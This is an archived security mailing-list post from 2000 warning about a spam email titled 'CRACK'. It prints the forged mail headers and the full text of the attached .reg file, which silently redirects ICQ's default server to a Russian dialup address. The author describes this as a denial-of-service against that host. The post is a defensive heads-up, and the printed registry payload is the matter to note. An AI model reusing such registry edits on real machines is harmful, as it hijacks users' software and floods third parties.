Security Incidents mailing list archives
Re: CRACK
From: oogali () INTRANOVA NET (Omachonu Ogali)
Date: Thu, 25 May 2000 09:45:31 -0400
Yesterday, an e-mail was sent to a mailing list I'm subscribed to with a subject of 'CRACK' and an attachment of 'crack.reg', after looking into it, you can see that the headers were forged, and the attachment edits your ICQ preferences in the registry and makes your default server a dialup victim/client in Russia. Headers: -- snip -- Return-Path: <owner-freebsd-jobs () FreeBSD ORG> Delivered-To: oogali () hydrant intranova net Received: from intranova.net (blacklisted.intranova.net [209.3.31.70]) by hydrant.intranova.net (Postfix) with SMTP id 33F73E1368 for <oogali () hydrant intranova net>; Thu, 25 May 2000 00:12:21 -0400 Received: (qmail 14575 invoked by uid 1001); 24 May 2000 21:03:15 -0000 Delivered-To: oogali () intranova net Received: (qmail 14567 invoked from network); 24 May 2000 21:03:14 -0000 Received: from hub.freebsd.org (204.216.27.18) by blacklisted.intranova.net with SMTP; 24 May 2000 21:03:14 -0000 Received: by hub.freebsd.org (Postfix, from userid 538) id 0698B37B710; Wed, 24 May 2000 14:04:19 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by hub.freebsd.org (Postfix) with SMTP id 004672E8163; Wed, 24 May 2000 14:04:18 -0700 (PDT) (envelope-from owner-freebsd-jobs) Received: by hub.freebsd.org (bulk_mailer v1.12); Wed, 24 May 2000 14:04:18 -0700 Delivered-To: freebsd-jobs () freebsd org Received: from demos.su (mx.demos.su [194.87.0.32]) by hub.freebsd.org (Postfix) with ESMTP id EC47637BD6F for <jobs () freebsd org>; Wed, 24 May 2000 14:04:12 -0700 (PDT) (envelope-from ppbsereb%geisteskrank.demos.su () sinbin demos su) Received: from sinbin.demos.su ([194.87.5.31] verified) by demos.su (CommuniGate Pro SMTP 3.2.4) with SMTP id 6364870 for jobs () freebsd org; Thu, 25 May 2000 01:04:10 +0400 Received: from geisteskrank.demos.su by sinbin.demos.su with ESMTP id BAA44176; (8.6.12/D) Thu, 25 May 2000 01:03:03 +0400 Received: from rcomputer by geisteskrank.demos.su with SMTP id BAA61511; (8.9.3/D) Thu, 25 May 2000 01:02:32 +0400 (MSD) Message-Id: <200005242102.BAA61511 () geisteskrank demos su> From: "zulti () hotmail com" <zulti () hotmail com> To: <jobs () freebsd org> Subject: CRACK Date: Thu, 25 May 2000 01:01:38 ^? () MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_01F6_01BF2E09.23F97E80" X-Priority: 1 X-MSMail-Priority: High X-Mailer: 'WE' Group Spamer Sender: owner-freebsd-jobs () FreeBSD ORG X-Loop: FreeBSD.org Precedence: bulk -- snip -- Attachment: -- snip -- REGEDIT4 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\DefaultPrefs] "Default Server Port"=dword:00001446 "Default Server Host"="195.133.10.234" -- snip -- -- snip -- Server: localhost.intranova.net Address: 127.0.0.1 Name: 234.10.133.195.dynamic.dialup.ru Address: 195.133.10.234 -- snip -- Once again, the problem here is people opening attachments without taking a look at them. Thank God this isn't a self-replicating e-mail, but it presents a Denial-of-Service attack against this Russian dialup. In conclusion...heads up! -- +-------------------------------------------------------------------------+ | Omachonu Ogali oogali () intranova net | | Intranova Networking Group http://tribune.intranova.net | | PGP Key ID: 0xBFE60839 | | PGP Fingerprint: C8 51 14 FD 2A 87 53 D1 E3 AA 12 12 01 93 BD 34 | +-------------------------------------------------------------------------+
Current thread:
- Re: CRACK Omachonu Ogali (May 25)
- Re: CRACK Gordon Messmer (May 25)